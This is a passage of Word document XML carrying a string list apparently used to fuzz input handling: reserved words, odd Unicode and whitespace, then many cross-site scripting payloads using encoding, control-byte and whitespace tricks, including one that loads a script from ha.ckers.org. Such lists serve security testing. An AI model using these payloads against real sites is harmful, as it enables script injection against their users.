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Single: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">undefined | undef | null | NULL | (null) | nil | NIL | true | false | True | False | TRUE | FALSE | None | hasOwnProperty | then | constructor | \ | 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–1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,./;'[]-= | &lt;&gt;?:"|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">+ | !@#$%^&amp;()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">~ |  |  | \t \u0085             ​\u2028\u2029  　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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">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“” | ‘"’ | “''''"'” | “'"'"''''” | &lt;foo val=“bar” /&gt; | &lt;foo val=“bar” /&gt; | &lt;foo val=”bar“ /&gt; | &lt;foo val=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">bar' /&gt; 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᚛ᚄᚓᚐᚋᚒᚄ ᚑᚄᚂᚑᚏᚅ᚜ | ᚛                 ᚜ | ‪‪test‪ | ‫test‫ |  test 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&lt;script&gt;alert(0)&lt;/script&gt; | &amp;lt;script&amp;gt;alert(&amp;#39;1&amp;#39;);&amp;lt;/script&amp;gt; | &lt;img src=x onerror=alert(2) /&gt; | &lt;svg&gt;&lt;script&gt;123&lt;1&gt;alert(3)&lt;/script&gt; | "&gt;&lt;script&gt;alert(4)&lt;/script&gt; | '&gt;&lt;script&gt;alert(5)&lt;/script&gt; | &gt;&lt;script&gt;alert(6)&lt;/script&gt; | &lt;/script&gt;&lt;script&gt;alert(7)&lt;/script&gt; | &lt; / script &gt;&lt; script &gt;alert(8)&lt; / script &gt; |  onfocus=JaVaSCript:alert(9) autofocus | " onfocus=JaVaSCript:alert(10) autofocus | ' onfocus=JaVaSCript:alert(11) autofocus | ＜script＞alert(12)＜/script＞ | &lt;sc&lt;script&gt;ript&gt;alert(13)&lt;/sc&lt;/script&gt;ript&gt; | --&gt;&lt;script&gt;alert(14)&lt;/script&gt; | ";alert(15);t=" | ';alert(16);t=' | JavaSCript:alert(17) | ;alert(18); | src=JaVaSCript:prompt(19) | "&gt;&lt;script&gt;alert(20);&lt;/script x=" | '&gt;&lt;script&gt;alert(21);&lt;/script x=' | &gt;&lt;script&gt;alert(22);&lt;/script x= | " autofocus onkeyup="javascript:alert(23) | ' autofocus onkeyup='javascript:alert(24) | &lt;script\x20type="text/javascript"&gt;javascript:alert(25);&lt;/script&gt; | &lt;script\x3Etype="text/javascript"&gt;javascript:alert(26);&lt;/script&gt; | &lt;script\x0Dtype="text/javascript"&gt;javascript:alert(27);&lt;/script&gt; | &lt;script\x09type="text/javascript"&gt;javascript:alert(28);&lt;/script&gt; | &lt;script\x0Ctype="text/javascript"&gt;javascript:alert(29);&lt;/script&gt; | &lt;script\x2Ftype="text/javascript"&gt;javascript:alert(30);&lt;/script&gt; | &lt;script\x0Atype="text/javascript"&gt;javascript:alert(31);&lt;/script&gt; | '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"&gt;&lt;\x3Cscript&gt;javascript:alert(32)&lt;/script&gt; | '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"&gt;&lt;\x00script&gt;javascript:alert(33)&lt;/script&gt; | ABC&lt;div style="x\x3Aexpression(javascript:alert(34)"&gt;DEF | ABC&lt;div style="x:expression\x5C(javascript:alert(35)"&gt;DEF | ABC&lt;div style="x:expression\x00(javascript:alert(36)"&gt;DEF | ABC&lt;div style="x:exp\x00ression(javascript:alert(37)"&gt;DEF | ABC&lt;div style="x:exp\x5Cression(javascript:alert(38)"&gt;DEF | ABC&lt;div style="x:\x0Aexpression(javascript:alert(39)"&gt;DEF | ABC&lt;div style="x:\x09expression(javascript:alert(40)"&gt;DEF | ABC&lt;div style="x:\xE3\x80\x80expression(javascript:alert(41)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x84expression(javascript:alert(42)"&gt;DEF | ABC&lt;div style="x:\xC2\xA0expression(javascript:alert(43)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x80expression(javascript:alert(44)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x8Aexpression(javascript:alert(45)"&gt;DEF | ABC&lt;div style="x:\x0Dexpression(javascript:alert(46)"&gt;DEF | ABC&lt;div style="x:\x0Cexpression(javascript:alert(47)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x87expression(javascript:alert(48)"&gt;DEF | ABC&lt;div style="x:\xEF\xBB\xBFexpression(javascript:alert(49)"&gt;DEF | ABC&lt;div style="x:\x20expression(javascript:alert(50)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x88expression(javascript:alert(51)"&gt;DEF | ABC&lt;div style="x:\x00expression(javascript:alert(52)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x8Bexpression(javascript:alert(53)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x86expression(javascript:alert(54)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x85expression(javascript:alert(55)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x82expression(javascript:alert(56)"&gt;DEF | ABC&lt;div style="x:\x0Bexpression(javascript:alert(57)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x81expression(javascript:alert(58)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x83expression(javascript:alert(59)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x89expression(javascript:alert(60)"&gt;DEF | &lt;a href="\x0Bjavascript:javascript:alert(61)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x0Fjavascript:javascript:alert(62)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xC2\xA0javascript:javascript:alert(63)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x05javascript:javascript:alert(64)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE1\xA0\x8Ejavascript:javascript:alert(65)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x18javascript:javascript:alert(66)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x11javascript:javascript:alert(67)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x88javascript:javascript:alert(68)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x89javascript:javascript:alert(69)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x80javascript:javascript:alert(70)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x17javascript:javascript:alert(71)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x03javascript:javascript:alert(72)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x0Ejavascript:javascript:alert(73)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x1Ajavascript:javascript:alert(74)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x00javascript:javascript:alert(75)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x10javascript:javascript:alert(76)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x82javascript:javascript:alert(77)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x20javascript:javascript:alert(78)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x13javascript:javascript:alert(79)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x09javascript:javascript:alert(80)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x8Ajavascript:javascript:alert(81)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x14javascript:javascript:alert(82)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x19javascript:javascript:alert(83)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\xAFjavascript:javascript:alert(84)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x1Fjavascript:javascript:alert(85)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x81javascript:javascript:alert(86)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x1Djavascript:javascript:alert(87)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x87javascript:javascript:alert(88)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x07javascript:javascript:alert(89)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE1\x9A\x80javascript:javascript:alert(90)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x83javascript:javascript:alert(91)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x04javascript:javascript:alert(92)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x01javascript:javascript:alert(93)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x08javascript:javascript:alert(94)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x84javascript:javascript:alert(95)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x86javascript:javascript:alert(96)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE3\x80\x80javascript:javascript:alert(97)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x12javascript:javascript:alert(98)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x0Djavascript:javascript:alert(99)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x0Ajavascript:javascript:alert(100)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x0Cjavascript:javascript:alert(101)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x15javascript:javascript:alert(102)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\xA8javascript:javascript:alert(103)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x16javascript:javascript:alert(104)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x02javascript:javascript:alert(105)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x1Bjavascript:javascript:alert(106)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x06javascript:javascript:alert(107)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\xA9javascript:javascript:alert(108)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x85javascript:javascript:alert(109)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x1Ejavascript:javascript:alert(110)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x81\x9Fjavascript:javascript:alert(111)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x1Cjavascript:javascript:alert(112)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="javascript\x00:javascript:alert(113)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="javascript\x3A:javascript:alert(114)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="javascript\x09:javascript:alert(115)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="javascript\x0D:javascript:alert(116)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="javascript\x0A:javascript:alert(117)" id="fuzzelement1"&gt;test&lt;/a&gt; | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"'&gt;&lt;img src=xxx:x \x0Aonerror=javascript:alert(118)&gt; | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"'&gt;&lt;img src=xxx:x \x22onerror=javascript:alert(119)&gt; | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"'&gt;&lt;img src=xxx:x \x0Bonerror=javascript:alert(120)&gt; | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"'&gt;&lt;img src=xxx:x \x0Donerror=javascript:alert(121)&gt; | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"'&gt;&lt;img src=xxx:x \x2Fonerror=javascript:alert(122)&gt; | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"'&gt;&lt;img src=xxx:x \x09onerror=javascript:alert(123)&gt; | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"'&gt;&lt;img src=xxx:x \x0Conerror=javascript:alert(124)&gt; | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"'&gt;&lt;img src=xxx:x \x00onerror=javascript:alert(125)&gt; | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"'&gt;&lt;img src=xxx:x \x27onerror=javascript:alert(126)&gt; | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"'&gt;&lt;img src=xxx:x \x20onerror=javascript:alert(127)&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\x3Bjavascript:alert(128)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\x0Djavascript:alert(129)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xEF\xBB\xBFjavascript:alert(130)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x81javascript:alert(131)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x84javascript:alert(132)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE3\x80\x80javascript:alert(133)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\x09javascript:alert(134)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x89javascript:alert(135)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x85javascript:alert(136)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x88javascript:alert(137)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\x00javascript:alert(138)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\xA8javascript:alert(139)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x8Ajavascript:alert(140)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE1\x9A\x80javascript:alert(141)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\x0Cjavascript:alert(142)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\x2Bjavascript:alert(143)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xF0\x90\x96\x9Ajavascript:alert(144)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;-javascript:alert(145)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\x0Ajavascript:alert(146)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\xAFjavascript:alert(147)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\x7Ejavascript:alert(148)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x87javascript:alert(149)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x81\x9Fjavascript:alert(150)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\xA9javascript:alert(151)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xC2\x85javascript:alert(152)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xEF\xBF\xAEjavascript:alert(153)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x83javascript:alert(154)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x8Bjavascript:alert(155)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xEF\xBF\xBEjavascript:alert(156)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x80javascript:alert(157)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\x21javascript:alert(158)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x82javascript:alert(159)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x86javascript:alert(160)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE1\xA0\x8Ejavascript:alert(161)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\x0Bjavascript:alert(162)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\x20javascript:alert(163)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xC2\xA0javascript:alert(164)&lt;/script&gt; | &lt;img \x00src=x onerror="alert(165)"&gt; | &lt;img \x47src=x onerror="javascript:alert(166)"&gt; | &lt;img \x11src=x onerror="javascript:alert(167)"&gt; | &lt;img \x12src=x onerror="javascript:alert(168)"&gt; | &lt;img\x47src=x onerror="javascript:alert(169)"&gt; | &lt;img\x10src=x onerror="javascript:alert(170)"&gt; | &lt;img\x13src=x onerror="javascript:alert(171)"&gt; | &lt;img\x32src=x onerror="javascript:alert(172)"&gt; | &lt;img\x47src=x onerror="javascript:alert(173)"&gt; | &lt;img\x11src=x onerror="javascript:alert(174)"&gt; | &lt;img \x47src=x onerror="javascript:alert(175)"&gt; | &lt;img \x34src=x onerror="javascript:alert(176)"&gt; | &lt;img \x39src=x onerror="javascript:alert(177)"&gt; | &lt;img \x00src=x onerror="javascript:alert(178)"&gt; | &lt;img src\x09=x onerror="javascript:alert(179)"&gt; | &lt;img src\x10=x onerror="javascript:alert(180)"&gt; | &lt;img src\x13=x onerror="javascript:alert(181)"&gt; | &lt;img src\x32=x onerror="javascript:alert(182)"&gt; | &lt;img src\x12=x onerror="javascript:alert(183)"&gt; | &lt;img src\x11=x onerror="javascript:alert(184)"&gt; | &lt;img src\x00=x onerror="javascript:alert(185)"&gt; | &lt;img src\x47=x onerror="javascript:alert(186)"&gt; | &lt;img src=x\x09onerror="javascript:alert(187)"&gt; | &lt;img src=x\x10onerror="javascript:alert(188)"&gt; | &lt;img src=x\x11onerror="javascript:alert(189)"&gt; | &lt;img src=x\x12onerror="javascript:alert(190)"&gt; | &lt;img src=x\x13onerror="javascript:alert(191)"&gt; | &lt;img[a]b][c]src[d]=x[e]onerror=[f]"alert(192)"&gt; | &lt;img src=x onerror=\x09"javascript:alert(193)"&gt; | &lt;img src=x onerror=\x10"javascript:alert(194)"&gt; | &lt;img src=x onerror=\x11"javascript:alert(195)"&gt; | &lt;img src=x onerror=\x12"javascript:alert(196)"&gt; | &lt;img src=x onerror=\x32"javascript:alert(197)"&gt; | &lt;img src=x onerror=\x00"javascript:alert(198)"&gt; | &lt;a href=java&amp;#1&amp;#2&amp;#3&amp;#4&amp;#5&amp;#6&amp;#7&amp;#8&amp;#11&amp;#12script:javascript:alert(199)&gt;XXX&lt;/a&gt; | &lt;img src=“x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;javascript:alert(200)&lt;/script&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; | &lt;img src onerror /” '"= alt=javascript:alert(201)//"&gt; | &lt;title onpropertychange=javascript:alert(202)&gt;&lt;/title&gt;&lt;title title=&gt; | &lt;a href=http://foo.bar/#x=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">y&gt;&lt;/a&gt;&lt;img alt="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&lt;img src=x:x onerror=javascript:alert(203)&gt;&lt;/a&gt;"&gt; | &lt;!--[if]&gt;&lt;script&gt;javascript:alert(204)&lt;/script --&gt; | &lt;!--[if&lt;img src=x onerror=javascript:alert(205)//]&gt; --&gt; | &lt;script src="/\%(jscript)s"&gt;&lt;/script&gt; | &lt;script src="\\%(jscript)s"&gt;&lt;/script&gt; | &lt;IMG """&gt;&lt;SCRIPT&gt;alert(“206”)&lt;/SCRIPT&gt;"&gt; | &lt;IMG SRC=javascript:alert(String.fromCharCode(50,48,55))&gt; | &lt;IMG SRC=# onmouseover="alert('208')"&gt; | &lt;IMG SRC= onmouseover="alert(‘209’)"&gt; | &lt;IMG onmouseover="alert('210')"&gt; | &lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#50;&amp;#49;&amp;#49;&amp;#39;&amp;#41;&gt; | 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 | &lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x32&amp;#x31&amp;#x33&amp;#x27&amp;#x29&gt; | &lt;IMG SRC="jav   ascript:alert('214');"&gt; | &lt;IMG SRC="jav&amp;#x09;ascript:alert('215');"&gt; | &lt;IMG SRC="jav&amp;#x0A;ascript:alert('216');"&gt; | &lt;IMG SRC="jav&amp;#x0D;ascript:alert('217');"&gt; | perl -e ‘print "&lt;IMG SRC=java\0script:alert("218")&gt;";’ &gt; out | &lt;IMG SRC=" &amp;#14;  javascript:alert('219');"&gt; | &lt;SCRIPT/XSS SRC=“http://ha.ckers.org/xss.js”&gt;&lt;/SCRIPT&gt; | &lt;BODY onload!#$%&amp;()~+-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.,:;?@[/|]^</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
